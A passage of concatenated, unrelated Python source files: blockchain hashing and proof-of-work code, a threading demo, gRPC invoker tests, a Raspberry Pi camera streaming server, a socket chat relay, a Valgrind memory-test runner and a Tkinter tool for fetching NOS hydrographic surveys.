ValueError: Will be raised if no ``Block`` object is passed.
"""
if not isinstance(block, Block):
raise ValueError("Only `Block` objects are hashable!")
logger.debug(f"Hashing block ... - block.index: {block.index}, block.proof: {block.proof}, block.previous_hash: {block.previous_hash}, block.timestamp: {block.timestamp}, block.data.id: {block.data.id}, block.data.message: {block.data.message}")
hash_value = hashlib.sha256(bytes(block)).hexdigest()
logger.debug(f"Hashing block done. - block hash: {hash_value}")
return hash_value
@staticmethod
def _is_proof_of_work_valid(last_proof: int, proof: int, difficulty: int) -> bool:
"""
Checks if the proof of work was correct.
        The hash of ``last_proof`` concatenated with ``proof`` has to end with ``difficulty`` trailing 0s.
Args:
last_proof (int): Value of the ``proof`` of the preceding block.
proof (int): ``proof`` of the actual block.
difficulty (int): Amount of trailing 0s.
Returns:
bool: ``True`` if proof of work is correct, ``False`` otherwise.
Raises:
ValueError: Will be raised if ``difficulty`` is not a positive integer value.
"""
if difficulty <= 0:
raise ValueError("'difficulty' has to be a positive integer value.")
guess = "{}{}".format(last_proof, proof).encode()
guess_hash = hashlib.sha256(guess).hexdigest()
# hash ends with `difficulty` trailing 0?
return guess_hash[-difficulty:] == "0" * difficulty
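    # Example of the check above (hypothetical numbers): with difficulty=2, a pair
    # (last_proof=42, proof=p) is valid only if
    # hashlib.sha256("{}{}".format(42, p).encode()).hexdigest() ends in "00".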
@property
def blockchain(self) -> Blockchain:
return self._blockchain
@property
def difficulty(self) -> int:
return self._difficulty
@property
def unprocessed_data(self) -> set:
return self._unprocessed_messages
@unprocessed_data.setter
def unprocessed_data(self, unprocessed_messages: set) -> None:
self._unprocessed_messages = unprocessed_messages
@property
def neighbours(self) -> set:
return self._neighbours
@property
def port(self) -> int:
return self._port
@property
def jobs(self) -> list:
return self._jobs
@property
def server_process(self) -> Process:
return self._server_process
@property
def queue(self) -> Queue:
return self._queue
|
M2_Multithreading.py
|
from threading import Thread
def func1(length):
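    # Computes the simple sum 0 + 1 + ... + (length - 1)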
sum_f1 = 0
for x in range(0, length):
sum_f1 += x
print('Sum is {}'.format(sum_f1))
def func2(length):
""" Computes the sum of squares"""
sum_f2 = 0
for x in range(0, length):
sum_f2 += x * x
print('Sum of squares is {}'.format(sum_f2))
def func3(length):
""" Computes the sum of cubes"""
sum_f3 = 0
for x in range(0, length):
sum_f3 += x ** 3
print('Sum of cubes is {}'.format(sum_f3))
# Threading part
def do_threading():
length = 3
thread_simple = Thread(target=func1, args=(length,))
thread_square = Thread(target=func2, args=(length,))
thread_cube = Thread(target=func3, args=(length,))
# Start Execution
thread_simple.start()
thread_square.start()
thread_cube.start()
    # Wait for all threads to finish
thread_simple.join()
thread_square.join()
thread_cube.join()
do_threading()
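# A minimal sketch (not part of the original script): the sums above are CPU-bound, so
# the threads take turns under the GIL and gain no speed-up. Running the same functions
# in separate processes gives real parallelism. Note that with the 'spawn' start method
# each child re-imports this module, so do_threading() above runs once more per child.
if __name__ == '__main__':
    from multiprocessing import Process
    processes = [Process(target=f, args=(1_000_000,)) for f in (func1, func2, func3)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()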
|
test_function_invoker.py
|
__copyright__ = '''
Copyright 2018 the original author or authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
__author__ = 'David Turanski'
from tests.utils import testutils
import sys
if sys.version_info[0] != 3:
raise RuntimeError("Requires Python 3")
import unittest
import os
import threading
import grpc
import uuid
sys.path.append('invoker')
sys.path.append('tests/functions')
import invoker.function_invoker
import invoker.function_pb2_grpc as function
import invoker.function_pb2 as message
class FunctionInvokerTest(unittest.TestCase):
"""
    Runs function_invoker in a background thread, which is easier for debugging.
Assumes os.getcwd() is the project base directory
"""
def test_upper(self):
env = function_env('upper.py','handle')
func, interaction_model = invoker.function_invoker.install_function(env)
self.assertEqual('handle',func.__name__)
self.assertIsNone(interaction_model)
threading.Thread(target=invoker.function_invoker.invoke_function, args=([func,interaction_model,env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
def generate_messages():
headers = {
'Content-Type': message.Message.HeaderValue(values=['text/plain']),
'correlationId': message.Message.HeaderValue(values=[str(uuid.uuid4())])
}
messages = [
message.Message(payload=bytes("hello", 'UTF-8'), headers=headers),
message.Message(payload=bytes("world", 'UTF-8'), headers=headers),
message.Message(payload=bytes("foo", 'UTF-8'), headers=headers),
message.Message(payload=bytes("bar", 'UTF-8'), headers=headers),
]
for msg in messages:
yield msg
responses = function.MessageFunctionStub(channel).Call(generate_messages())
expected = [b'HELLO', b'WORLD', b'FOO', b'BAR']
for response in responses:
self.assertTrue(response.payload in expected)
expected.remove(response.payload)
self.assertEqual(0, len(expected))
invoker.function_invoker.stop()
def test_bidirectional(self):
env = function_env('streamer.py','bidirectional')
func, interaction_model = invoker.function_invoker.install_function(env)
self.assertEqual('bidirectional', func.__name__)
self.assertEqual('stream',interaction_model)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
stub = function.MessageFunctionStub(channel)
def generate_messages():
headers = {
'Content-Type': message.Message.HeaderValue(values=['text/plain']),
}
messages = [
message.Message(payload=b'foo', headers=headers),
message.Message(payload=b'bar', headers=headers),
message.Message(payload=b'baz', headers=headers),
message.Message(payload=b'faz', headers=headers),
]
for msg in messages:
yield msg
responses = stub.Call(generate_messages())
expected = [b'FOO', b'BAR', b'BAZ', b'FAZ']
for response in responses:
self.assertTrue(response.payload in expected)
expected.remove(response.payload)
self.assertEqual(0, len(expected))
invoker.function_invoker.stop()
def test_filter(self):
env = function_env('streamer.py','filter')
func, interaction_model = invoker.function_invoker.install_function(env)
self.assertEqual('filter', func.__name__)
self.assertEqual('stream',interaction_model)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
def generate_messages():
headers = {
'Content-Type': message.Message.HeaderValue(values=['text/plain'])
}
messages = [
message.Message(payload=b'foo', headers=headers),
message.Message(payload=b'bar', headers=headers),
message.Message(payload=b'foobar', headers=headers),
]
for msg in messages:
yield msg
responses = function.MessageFunctionStub(channel).Call(generate_messages())
expected = [b'foo', b'foobar']
for response in responses:
self.assertTrue(response.payload in expected)
expected.remove(response.payload)
self.assertEqual(0, len(expected))
invoker.function_invoker.stop()
def test_discrete_window(self):
from itertools import count
import struct
import json
env = function_env('windows.py','discrete_window')
func, interaction_model = invoker.function_invoker.install_function(env)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
'''
unbounded generator of Messages converting int to bytes
'''
messages = (message.Message(payload=struct.pack(">I",i), headers = {'Content-Type': message.Message.HeaderValue(values=['application/octet-stream'])}) for i in count())
responses = function.MessageFunctionStub(channel).Call(messages)
'''
Check the first 10 responses. Each message is a json serialized tuple of size 3 containing the next sequence of ints.
'''
for i in range(10):
tpl = json.loads(next(responses).payload)
self.assertEqual(3, len(tpl))
for j in range(len(tpl)):
self.assertEqual(i*3+j, tpl[j])
invoker.function_invoker.stop()
def test_discrete_window_text(self):
from itertools import count
import json
env = function_env('windows.py','discrete_window_text')
func, interaction_model = invoker.function_invoker.install_function(env)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
'''
    unbounded generator of Messages converting ints to text payloads ('X0', 'X1', ...)
'''
messages = (message.Message(payload=bytes("X%d" % i,'UTF-8') , headers = {'Content-Type': message.Message.HeaderValue(values=['text/plain'])}) for i in count())
responses = function.MessageFunctionStub(channel).Call(messages)
'''
Check the first 10 responses. Each message is a json serialized tuple of size 3 containing the next sequence of ints.
'''
for _ in range(10):
tpl = json.loads(next(responses).payload)
invoker.function_invoker.stop()
def test_sliding_window(self):
from itertools import count
import struct
import json
env = function_env('windows.py','sliding_window')
func, interaction_model = invoker.function_invoker.install_function(env)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
'''
unbounded generator of Messages converting int to bytes
'''
messages = (message.Message(payload=struct.pack(">I",i), headers = {'Content-Type': message.Message.HeaderValue(values=['application/octet-stream'])}) for i in count())
responses = function.MessageFunctionStub(channel).Call(messages)
'''
Check the first 10 responses. Each message is a json serialized tuple of size 3 containing the next sequence
of ints: ((0,1,2),(1,2,3),(2,3,4))
'''
for i in range(10):
tpl = json.loads(next(responses).payload)
self.assertEqual(3, len(tpl))
for j in range(len(tpl)):
self.assertEqual(i+j, tpl[j])
invoker.function_invoker.stop()
def test_source(self):
env = function_env('streamer.py','source')
func, interaction_model = invoker.function_invoker.install_function(env)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
def messages():
yield message.Message()
responses = function.MessageFunctionStub(channel).Call(messages())
for i in range(10):
self.assertEqual(bytes(str(i),'utf-8'), next(responses).payload)
invoker.function_invoker.stop()
def test_zip(self):
env = {
'FUNCTION_URI' : 'file://%s/tests/zip/myfunc.zip?handler=func.handler' % os.getcwd(),
'GRPC_PORT': testutils.find_free_port()
}
func, interaction_model = invoker.function_invoker.install_function(env)
self.assertEqual('HELLO',func('hello'))
os.remove('func.py')
os.remove('helpers.py')
self.assertEqual('handler',func.__name__)
def function_env(module,handler):
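    # Builds the environment the invoker expects: FUNCTION_URI points at a local test
    # module plus its handler name, GRPC_PORT is a free port for the test gRPC server.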
return {
'FUNCTION_URI': 'file://%s/tests/functions/%s?handler=%s' % (os.getcwd(),module,handler),
'GRPC_PORT': testutils.find_free_port()
}
|
server.py
|
#!/usr/bin/env python
import sys
import io
import os
import shutil
from urllib.parse import urlparse, parse_qs
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 24
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
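# Handshake frame sent to each jsmpeg client on connect: the 4-byte magic followed by
# the 16-bit big-endian width and height (see StreamingWebSocket.opened below).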
VFLIP = True
HFLIP = True
###########################################
class StreamingHttpHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.do_GET()
def do_GET(self):
o = urlparse(self.path)
path = o.path
query = parse_qs(o.query)
if path == '/':
self.send_response(301)
self.send_header('Location', '/index.html')
self.end_headers()
return
elif path == '/jsmpg.js':
content_type = 'application/javascript'
content = self.server.jsmpg_content
elif path == '/index.html':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.index_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
elif path == '/camera-settings':
content_type = 'text/html'
content = 'works'
self.server.camera.iso = int((query.get('iso')[0]))
else:
self.send_error(404, 'File not found')
return
content = content.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', len(content))
self.send_header('Last-Modified', self.date_time_string(time()))
self.end_headers()
if self.command == 'GET':
self.wfile.write(content)
class StreamingHttpServer(HTTPServer):
def __init__(self, camera):
super(StreamingHttpServer, self).__init__(
('', HTTP_PORT), StreamingHttpHandler)
self.camera = camera
with io.open('index.html', 'r') as f:
self.index_template = f.read()
with io.open('jsmpg.js', 'r') as f:
self.jsmpg_content = f.read()
class StreamingWebSocket(WebSocket):
def opened(self):
self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)
class BroadcastOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpeg1video',
'-b', '800k',
'-r', str(float(camera.framerate)),
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
self.counter = 0
def run(self):
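        # Read MPEG1 data from the ffmpeg converter's stdout and broadcast every buffer
        # to all websocket clients as a binary frame; roughly every 30 buffers a
        # millisecond timestamp is sent as a text frame. The loop ends when ffmpeg exits.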
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.counter = self.counter + 1
self.websocket_server.manager.broadcast(buf, binary=True)
if self.counter > 30:
mill = int(round(time() * 1000))
self.counter = 0
self.websocket_server.manager.broadcast(str(mill), binary=False)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(1) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=StreamingWebSocket))
websocket_server.initialize_websockets_manager()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = StreamingHttpServer(camera)
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = BroadcastOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
relay.py
|
import socket
from multiprocessing.dummy import Process, Pool
import settings
def listen(c):
while True:
try:
msg = c.recv(1024).decode('utf8')
except Exception as e:
print('[!] Error:', e)
clients.remove(c)
return
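        # Fan out: re-send the received message to every connected client
        # (including the sender) using a thread pool.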
sendPool = Pool()
sendPool.map(lambda x: x.send(msg.encode('utf8')), clients)
def close():
print('[!] Server closed', clients)
for c in clients:
c.close()
def accept():
    # accept all incoming connections
(client, client_address) = s.accept()
print(f'[+] {client_address[0]} connected to server')
clients.add(client)
list_Processes.append(Process(target=listen, args=(client,)))
list_Processes[-1].start()
if __name__ == "__main__":
clients = set()
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((settings.host, settings.port))
s.listen(100)
    print(f'Server started on {settings.host}:{settings.port}')
    # this stores all the listener processes
list_Processes = []
while True:
accept()
# close server socket
#close()
s.close()
|
memory_tests.py
|
# Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import shlex, subprocess, time, os, socket, sys, threading
if os.environ.get("PROFILING_BINS"):
binaries = os.environ.get("PROFILING_BINS").split(';')
valgrind = os.environ.get("VALGRIND_BIN")
certs_path = os.environ.get("CERTS_PATH")
test_time = "10"
if not valgrind:
valgrind = "valgrind"
def start_test(command, pubsub, time, transport):
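    # Runs the given binary twice under Valgrind's massif heap profiler (best-effort and
    # reliable QoS); each massif output file is then converted to CSV by memory_analysis.py.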
os.system("mkdir -p output")
valgrind_command_rel = [valgrind, "--tool=massif", "--stacks=yes", "--detailed-freq=1", "--max-snapshots=1000", "--massif-out-file=./output/consumption_" + pubsub + "_" + transport + "_rel.out"]
valgrind_command_be = [valgrind, "--tool=massif", "--stacks=yes", "--detailed-freq=1", "--max-snapshots=1000", "--massif-out-file=./output/consumption_" + pubsub + "_" + transport + "_be.out"]
options = ["--time=" + time]
if certs_path:
options.extend(["--security=true", "--certs=" + certs_path])
# Best effort
print(valgrind_command_be +
[command, pubsub] +
options)
proc = subprocess.Popen(valgrind_command_be +
[command, pubsub] +
options)
proc.communicate()
py_command = "python3 ./memory_analysis.py ./output/consumption_" + pubsub + "_" + transport + "_be.out ./output/MemoryTest_" + pubsub + "_" + transport + "_be.csv"
p = subprocess.Popen(py_command, shell=True)
# Reliable
proc = subprocess.Popen(valgrind_command_rel +
[command, pubsub, "-r", "reliable"] +
options)
proc.communicate()
py_command = "python3 ./memory_analysis.py ./output/consumption_" + pubsub + "_" + transport + "_rel.out ./output/MemoryTest_" + pubsub + "_" + transport + "_rel.csv"
# print("Command: " + py_command)
p = subprocess.Popen(py_command, shell=True)
transport = ""
if len(sys.argv) >= 5:
transport = sys.argv[4]
if len(sys.argv) >= 4:
test_time = sys.argv[3]
if len(sys.argv) >= 3:
binaries = [sys.argv[2]]
for command in binaries:
if len(sys.argv) >= 2:
pubsub = sys.argv[1]
start_test(command, pubsub, test_time, transport)
else:
tpub = threading.Thread(target=start_test, args=(command, "publisher", test_time, transport))
tpub.start()
tsub = threading.Thread(target=start_test, args=(command, "subscriber", test_time, transport))
tsub.start()
quit()
|
nosgui.py
|
#!/usr/bin/env python
### nosgui.py
##
## Copyright (c) 2012, 2013, 2014, 2016, 2017, 2018 Matthew Love
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
## of the Software, and to permit persons to whom the Software is furnished to do so,
## subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
## INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
## PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
## FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
## ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##
### Code:
import sys
import os
from os.path import expanduser
import threading
import webbrowser
import Tkinter as tk
import tkFileDialog
import noslib
_nosgui_version = '0.1.4'
class Application(tk.Frame):
def __init__(self, master=None, *args, **kwargs):
tk.Frame.__init__(self, master)
self.grid(sticky=tk.N+tk.S+tk.E+tk.W)
self.s = None
self._ngdc_url="https://www.ngdc.noaa.gov/mgg/bathymetry/hydro.html"
self.sv = tk.StringVar()
self.sv.trace("w", lambda name, index, mode, var=self.sv: self._entryUpdate(self.sv))
self.dtGEODAS = tk.IntVar()
#self.dtXYZ = tk.IntVar()
self.dtBAG = tk.IntVar()
self.dtDR = tk.IntVar()
self.dtSmooth_Sheets = tk.IntVar()
self.dtTIDES = tk.IntVar()
self.dtproject_sketches = tk.IntVar()
self.dtBottom_Samples = tk.IntVar()
#self.dtHYD93 = tk.IntVar()
self.dtXML = tk.IntVar()
self.dtGeoImagePDF = tk.IntVar()
self.dtt = True
self.downloading = tk.StringVar(value="idle")
self.data_types = {'BAG':self.dtBAG, 'DR':self.dtDR, 'Smooth_Sheets':self.dtSmooth_Sheets, 'TIDES':self.dtTIDES, 'project_sketches': self.dtproject_sketches, 'Bottom_Samples':self.dtBottom_Samples, 'XML':self.dtXML, 'GEODAS':self.dtGEODAS, 'GeoImagePDF':self.dtGeoImagePDF}
self.nl = noslib.nosLib()
self.create_widgets()
self._listBoxUpdate()
self.resetDataType()
self.resetFetchDir()
def create_widgets(self):
top=self.winfo_toplevel()
top.rowconfigure(0, weight=1)
top.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
## Menu
self.menuBar = tk.Menu(top, relief=tk.FLAT)
top['menu'] = self.menuBar
self.fileMenu = tk.Menu(self.menuBar, relief=tk.FLAT, tearoff=0)
self.surveyMenu = tk.Menu(self.menuBar, relief=tk.FLAT, tearoff=0)
self.optionsMenu = tk.Menu(self.menuBar, relief=tk.FLAT, tearoff=0)
self.helpMenu = tk.Menu(self.menuBar, relief=tk.FLAT, tearoff=0)
self.menuBar.add_cascade(label="File", menu=self.fileMenu)
self.menuBar.add_cascade(label="Survey", menu=self.surveyMenu)
self.menuBar.add_cascade(label="Options", menu=self.optionsMenu)
self.menuBar.add_cascade(label="Help", menu=self.helpMenu)
self.fileMenu.add_command(label="Fetch Listed Surveys", command=self.fetchl)
self.fileMenu.add_separator()
self.fileMenu.add_command(label="Save Survey List", state=tk.DISABLED)
self.fileMenu.add_command(label="Generate Info Table", state=tk.DISABLED)
self.fileMenu.add_separator()
self.fileMenu.add_command(label="Quit", command=self.quit)
self.surveyMenu.add_command(label="Survey Report", command=self.si, state=tk.DISABLED)
self.surveyMenu.add_command(label="Survey Metadata", command=self.sm, state=tk.DISABLED)
self.surveyMenu.add_separator()
self.surveyMenu.add_command(label="Fetch Survey", command=self.fetchs, state=tk.DISABLED)
self.optionsMenu.add_command(label="Set Fetch Directory", command=self.setFetchDir)
self.optionsMenu.add_command(label="Set Datatypes", command=self.setDataType)
self.optionsMenu.add_command(label="Reset Datatypes", command=self.resetDataType)
self.optionsMenu.add_separator()
self.optionsMenu.add_command(label="Filter Surveys by Region", command=self.rfilter)
self.optionsMenu.add_command(label="Filter Surveys by Year", command=self.yrfilter)
self.optionsMenu.add_command(label="Reset Surveys", command=self.resetSurveys)
self.optionsMenu.add_separator()
self.optionsMenu.add_command(label="Update Survey DB", command=self.updateSurveys)
self.helpMenu.add_command(label='About', command=self.about_self)
self.helpMenu.add_command(label='About NOS Data', command=self.sa)
## Survey Frame
self.surveyFrame = tk.Frame(self, padx=5, pady=5)
self.yScroll = tk.Scrollbar(self.surveyFrame, orient=tk.VERTICAL)
self.surveyEntry = tk.Entry(self.surveyFrame,textvariable=self.sv)
self.surveyListBox = tk.Listbox(self.surveyFrame, yscrollcommand=self.yScroll.set, width=60)
self.surveyFrame.rowconfigure(1, weight=1)
self.surveyFrame.columnconfigure(0, weight=1)
self.surveyFrame.grid(column=0, columnspan=2,row=0, sticky=tk.N+tk.S+tk.E+tk.W)
self.surveyEntry.grid(column=0,row=0, sticky=tk.N+tk.S+tk.E+tk.W)
self.surveyListBox.grid(column=0, row=1, rowspan=2, sticky=tk.N+tk.S+tk.E+tk.W)
self.surveyListBox.bind('<<ListboxSelect>>', self._listSelect)
self.yScroll.grid(column=1, row=0, rowspan=3,sticky=tk.N+tk.S+tk.E+tk.W)
self.yScroll['command'] = self.surveyListBox.yview
## status bar
self.statusBar = tk.Frame(self, padx=5, pady=5)
self.statusBar.grid(row=1, column=0, columnspan=2, sticky=tk.N+tk.S+tk.E+tk.W)
self.statusBar.rowconfigure(0, weight=1)
self.statusBar.columnconfigure(1, weight=1)
self.infoLabel = tk.Label(self.statusBar, textvariable=self.downloading)
self.infoLabel.grid(column=0, row=0, sticky=tk.N+tk.S+tk.E+tk.W)
self.listLabel = tk.Label(self.statusBar, text=str(len(self.nl.surveys)))
self.listLabel.grid(column=1, row=0, sticky=tk.E)
#self.listLabel.bind('<Button-1>', self.stopFetch)
def _reload_noslib(self):
reload(noslib)
self.nl = noslib.nosLib()
def _entryUpdate(self, sv):
tmp_sv = sv.get()
nslist=[]
self.nl._reset()
for i in self.nl.surveys:
if tmp_sv.upper() in i[0]:
nslist.append(i)
self.nl.surveys = nslist
self._listBoxUpdate()
def _listBoxUpdate(self):
self.surveyListBox.delete(0,self.surveyListBox.size())
for h,i in enumerate(self.nl.surveys):
self.surveyListBox.insert(tk.END, "%s (%s) %s" %(i[0], i[2], i[1]))
if h&1:
self.surveyListBox.itemconfig(h, background='gray90')
self.listLabel.config(text=str(len(self.nl.surveys)))
def _listSelect(self, evt):
# Note here that Tkinter passes an event object to onselect()
#w = evt.widget
if self.surveyListBox.curselection():
self.surveyMenu.entryconfigure(0,state=tk.NORMAL)
self.surveyMenu.entryconfigure(1,state=tk.NORMAL)
self.surveyMenu.entryconfigure(3,state=tk.NORMAL)
print("Survey: %s" %(self.nl.surveys[int(self.surveyListBox.curselection()[0])][0]))
def _onListSelect(self):
# Note here that Tkinter passes an event object to onselect()
#w = evt.widget
if self.surveyListBox.curselection():
index = int(self.surveyListBox.curselection()[0])
value = self.nl.surveys[index]
self.s = noslib.nosSurvey(value[0])
return True
else: return False
def yrfilter(self):
self.yw = tk.Toplevel(class_="nosfetch")
self.yw.title("Filter by Year")
self.by = tk.IntVar(value=0)
self.ey = tk.IntVar(value=3000)
self.yearFrame = tk.LabelFrame(self.yw, text="Year", padx=5, pady=5)
tk.Entry(self.yearFrame, width=10, textvariable=self.by).grid(column=0,row=0, sticky=tk.W)
tk.Entry(self.yearFrame, width=10, textvariable=self.ey).grid(column=1,row=0, sticky=tk.E)
tk.Button(self.yearFrame, text="Filter", command=self.yrfilterSurveys).grid(column=0,row=3, columnspan=2,sticky=tk.N+tk.S+tk.E+tk.W)
self.yearFrame.grid(column=0,row=0,columnspan=2, sticky=tk.N+tk.S+tk.E+tk.W)
def rfilter(self):
self.rw = tk.Toplevel(class_="nosfetch")
self.rw.title("Filter by Region")
self.bee = tk.StringVar(value="-90")
self.bew = tk.StringVar(value="-89")
self.ben = tk.StringVar(value="40")
self.bes = tk.StringVar(value="30")
## Region Frame
self.boundsFrame = tk.LabelFrame(self.rw, text="Region", padx=5, pady=5)
tk.Entry(self.boundsFrame, width=10, textvariable=self.bee).grid(column=0,row=1, sticky=tk.W)
tk.Entry(self.boundsFrame, width=10, textvariable=self.bew).grid(column=1,row=1, sticky=tk.E)
tk.Entry(self.boundsFrame, width=10, textvariable=self.ben).grid(column=0,row=0,columnspan=2, sticky=tk.N)
tk.Entry(self.boundsFrame, width=10, textvariable=self.bes).grid(column=0,row=2,columnspan=2, sticky=tk.S)
tk.Button(self.boundsFrame, text="Filter", command=self.filterSurveys).grid(column=0,row=3, columnspan=2,sticky=tk.N+tk.S+tk.E+tk.W)
self.boundsFrame.grid(column=0,row=0,columnspan=2, sticky=tk.N+tk.S+tk.E+tk.W)
def fetchSurveys(self, fsurveys):
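        # Fetch the selected surveys in a background thread so the GUI stays responsive;
        # the status label shows "fetching" while the downloads run and "idle" afterwards.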
def callback():
self.downloading.set("fetching")
for h,i in enumerate(fsurveys):
s = noslib.nosSurvey(i[0])
for dt in self.nl._dtypes:
#if dt in s._dtypes:
s.fetch(dt)
self.downloading.set("idle")
t = threading.Thread(target=callback)
t.start()
def fetchs(self):
if self.surveyListBox.curselection():
index = int(self.surveyListBox.curselection()[0])
fsurveys = [self.nl.surveys[index]]
self.fetchSurveys(fsurveys)
def fetchl(self):
print("Fetching %d Surveys" %(len(self.nl.surveys)))
self.fetchSurveys(self.nl.surveys)
def about_self(self):
self.about = tk.Toplevel(class_="about")
self.about.title("About nosgui")
## About Frame
self.aboutFrame = tk.LabelFrame(self.about, text="About", padx=5, pady=5)
self.aboutText = tk.Text(self.aboutFrame)
self.aboutText.grid(row=0,column=0)
self.aboutText.insert(tk.INSERT, " \n\
[ nosGUI ] \n\
------------ \n\
\n\
Fetch and query NOS hydrographic data.\n\
\n\
------------\n\
\n\
\n\
Send questions or comments, etc to <matthew.love@colorado.edu>\n\
")
self.aboutFrame.grid(column=0,row=0, sticky=tk.N+tk.S+tk.E+tk.W)
def sa(self):
print(self._ngdc_url)
webbrowser.open(self._ngdc_url)
def si(self):
is_sel = self._onListSelect()
print(self.s._data_url)
print(self.s._valid)
if is_sel:
if self.s:
webbrowser.open(self.s._data_url)
def sm(self):
is_sel = self._onListSelect()
print(self._ngdc_url)
if is_sel:
if self.s:
webbrowser.open(self.s._xml_url)
def resetSurveys(self):
self.nl._reset()
self.sv.set("")
self._listBoxUpdate()
def filterSurveys(self):
self.rw.destroy()
